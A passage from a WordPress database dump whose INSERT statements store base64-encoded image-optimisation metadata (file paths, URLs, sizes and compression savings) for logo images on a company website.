XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZTE0NzMxODQ5MDYxNDEtMjAweDk5LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6OTksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZTE0NzMxODQ5MDYxNDEtMjAweDk5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWUxNDczMTg0OTA2MTQxLTIwMHg5OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQxMDQsImlkIjoxMjQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWUxNDczMTg0OTA2MTQxLTIyNXg5OS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjk5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWUxNDczMTg0OTA2MTQxLTIyNXg5OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1lMTQ3MzE4NDkwNjE0MS0yMjV4OTkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MTA2LCJpZCI6MTI0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWUxNDczMTg0OTA2MTQxLTExNHg5OS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC90cmlib3N5cy1lMTQ3MzE4NDkwNjE0MS0xMTR4OTkuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiI5OSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC90cmlib3N5cy1lMTQ3MzE4NDkwNjE0MS0xMTR4OTkuanBnIiwicmVkdWN0aW9uIjo0NDksInRpbWUiOjE0ODM1NzQxMDgsImlkIjoxMjQ5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdHJpYm9zeXMtZTE0NzMxODQ5MDYxNDEtMTYweDk5LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3RyaWJvc3lzLWUxNDczMTg0OTA2MTQxLTE2MHg5OS5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6Ijk5IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3RyaWJvc3lzLWUxNDczMTg0OTA2MTQxLTE2MHg5OS5qcGciLCJyZWR1Y3Rpb24iOjYwNCwidGltZSI6MTQ4MzU3NDExMCwiaWQiOjEyNDl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29664, 1248, 'wpfc_optimisation_reduction', '1765'); 
INSERT INTO `wp_postmeta` VALUES (29665, 1248, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdnN5cy1lMTQ3MzE4NDg5NzU5Ny5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NvbHZzeXMtZTE0NzMxODQ4OTc1OTcuanBnIiwid2lkdGgiOjI0MCwiaGVpZ2h0Ijo5OSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3NvbHZzeXMtZTE0NzMxODQ4OTc1OTcuanBnIiwicmVkdWN0aW9uIjo3NTYsInRpbWUiOjE0ODM1NzQxMTYsImlkIjoiMTI0OCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdnN5cy1lMTQ3MzE4NDg5NzU5Ny0yMDB4OTkuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0Ijo5OSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9zb2x2c3lzLWUxNDczMTg0ODk3NTk3LTIwMHg5OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zb2x2c3lzLWUxNDczMTg0ODk3NTk3LTIwMHg5OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQxMTgsImlkIjoxMjQ4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NvbHZzeXMtZTE0NzMxODQ4OTc1OTctMjI1eDk5LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6OTksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdnN5cy1lMTQ3MzE4NDg5NzU5Ny0yMjV4OTkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc29sdnN5cy1lMTQ3MzE4NDg5NzU5Ny0yMjV4OTkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MTIwLCJpZCI6MTI0OH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NvbHZzeXMtZTE0NzMxODQ4OTc1OTctMTE0eDk5LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3NvbHZzeXMtZTE0NzMxODQ4OTc1OTctMTE0eDk5LmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiOTkiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvc29sdnN5cy1lMTQ3MzE4NDg5NzU5Ny0xMTR4OTkuanBnIiwicmVkdWN0aW9uIjo0MjgsInRpbWUiOjE0ODM1NzQxMjIsImlkIjoxMjQ4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdnN5cy1lMTQ3MzE4NDg5NzU5Ny0xNjB4OTkuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvc29sdnN5cy1lMTQ3MzE4NDg5NzU5Ny0xNjB4OTkuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiI5OSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9zb2x2c3lzLWUxNDczMTg0ODk3NTk3LTE2MHg5OS5qcGciLCJyZWR1Y3Rpb24iOjU3OSwidGltZSI6MTQ4MzU3NDEyNCwiaWQiOjEyNDh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29666, 1247, 'wpfc_optimisation_reduction', '1790'); 
INSERT INTO `wp_postmeta` VALUES (29667, 1247, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtcmVsZWFzZS1hZ2VudHMtZTE0NzMxODQ4ODgyMjAuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy1yZWxlYXNlLWFnZW50cy1lMTQ3MzE4NDg4ODIyMC5qcGciLCJ3aWR0aCI6MjQwLCJoZWlnaHQiOjk5LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtcmVsZWFzZS1hZ2VudHMtZTE0NzMxODQ4ODgyMjAuanBnIiwicmVkdWN0aW9uIjo3NzgsInRpbWUiOjE0ODM1NzQxMzEsImlkIjoiMTI0NyJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtcmVsZWFzZS1hZ2VudHMtZTE0NzMxODQ4ODgyMjAtMjAweDk5LmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6OTksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtcmVsZWFzZS1hZ2VudHMtZTE0NzMxODQ4ODgyMjAtMjAweDk5LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLXJlbGVhc2UtYWdlbnRzLWUxNDczMTg0ODg4MjIwLTIwMHg5OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQxMzMsImlkIjoxMjQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLXJlbGVhc2UtYWdlbnRzLWUxNDczMTg0ODg4MjIwLTIyNXg5OS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjk5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLXJlbGVhc2UtYWdlbnRzLWUxNDczMTg0ODg4MjIwLTIyNXg5OS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy1yZWxlYXNlLWFnZW50cy1lMTQ3MzE4NDg4ODIyMC0yMjV4OTkuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MTM1LCJpZCI6MTI0N30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLXJlbGVhc2UtYWdlbnRzLWUxNDczMTg0ODg4MjIwLTExNHg5OS5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy1yZWxlYXNlLWFnZW50cy1lMTQ3MzE4NDg4ODIyMC0xMTR4OTkuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiI5OSIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy1yZWxlYXNlLWFnZW50cy1lMTQ3MzE4NDg4ODIyMC0xMTR4OTkuanBnIiwicmVkdWN0aW9uIjo0MjAsInRpbWUiOjE0ODM1NzQxMzcsImlkIjoxMjQ3fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtcmVsZWFzZS1hZ2VudHMtZTE0NzMxODQ4ODgyMjAtMTYweDk5LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLXJlbGVhc2UtYWdlbnRzLWUxNDczMTg0ODg4MjIwLTE2MHg5OS5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6Ijk5IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLXJlbGVhc2UtYWdlbnRzLWUxNDczMTg0ODg4MjIwLTE2MHg5OS5qcGciLCJyZWR1Y3Rpb24iOjU5MCwidGltZSI6MTQ4MzU3NDEzOSwiaWQiOjEyNDd9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29668, 1244, 'wpfc_optimisation_reduction', '1191'); 
INSERT INTO `wp_postmeta` VALUES (29669, 1244, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpY2FsLWNoZW1pY2Fscy1lMTQ3MzE3NjEyMzc3Mi5qcGciLCJ3aWR0aCI6OTQ1LCJoZWlnaHQiOjY4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzIuanBnIiwicmVkdWN0aW9uIjo4ODMsInRpbWUiOjE0ODM1NzQxNDUsImlkIjoiMTI0NCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItMzQweDY4LmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItMzQweDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21lZGljYWwtY2hlbWljYWxzLWUxNDczMTc2MTIzNzcyLTM0MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQxNDcsImlkIjoxMjQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21lZGljYWwtY2hlbWljYWxzLWUxNDczMTc2MTIzNzcyLTgwMHg1OC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjU4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21lZGljYWwtY2hlbWljYWxzLWUxNDczMTc2MTIzNzcyLTgwMHg1OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tZWRpY2FsLWNoZW1pY2Fscy1lMTQ3MzE3NjEyMzc3Mi04MDB4NTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MTUwLCJpZCI6MTI0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpY2FsLWNoZW1pY2Fscy1lMTQ3MzE3NjEyMzc3Mi03Njh4NTUuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpY2FsLWNoZW1pY2Fscy1lMTQ3MzE3NjEyMzc3Mi03Njh4NTUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItNzY4eDU1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDE1MiwiaWQiOjEyNDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItMjUweDY4LmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItMjUweDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21lZGljYWwtY2hlbWljYWxzLWUxNDczMTc2MTIzNzcyLTI1MHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQxNTQsImlkIjoxMjQ0fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21lZGljYWwtY2hlbWljYWxzLWUxNDczMTc2MTIzNzcyLTIwMHg2OC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21lZGljYWwtY2hlbWljYWxzLWUxNDczMTc2MTIzNzcyLTIwMHg2OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9tZWRpY2FsLWNoZW1pY2Fscy1lMTQ3MzE3NjEyMzc3Mi0yMDB4NjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTc0MTU2LCJpZCI6MTI0NH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpY2FsLWNoZW1pY2Fscy1lMTQ3MzE3NjEyMzc3Mi0yMjV4NjguanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0Ijo2OCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpY2FsLWNoZW1pY2Fscy1lMTQ3MzE3NjEyMzc3Mi0yMjV4NjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItMjI1eDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDE1OCwiaWQiOjEyNDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItNTEweDY4LmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItNTEweDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21lZGljYWwtY2hlbWljYWxzLWUxNDczMTc2MTIzNzcyLTUxMHg2OC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzQxNjEsImlkIjoxMjQ0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItMTE0eDY4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL21lZGljYWwtY2hlbWljYWxzLWUxNDczMTc2MTIzNzcyLTExNHg2OC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjY4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL21lZGljYWwtY2hlbWljYWxzLWUxNDczMTc2MTIzNzcyLTExNHg2OC5qcGciLCJyZWR1Y3Rpb24iOjI5NiwidGltZSI6MTQ4MzU3NDE2MywiaWQiOjEyNDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpY2FsLWNoZW1pY2Fscy1lMTQ3MzE3NjEyMzc3Mi0xNjB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItMTYweDY4LmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiNjgiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItMTYweDY4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3NDE2NSwiaWQiOjEyNDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9tZWRpY2FsLWNoZW1pY2Fscy1lMTQ3MzE3NjEyMzc3Mi0xODB4NjguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvbWVkaWNhbC1jaGVtaWNhbHMtZTE0NzMxNzYxMjM3NzItMTgweDY4LmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiNjgiL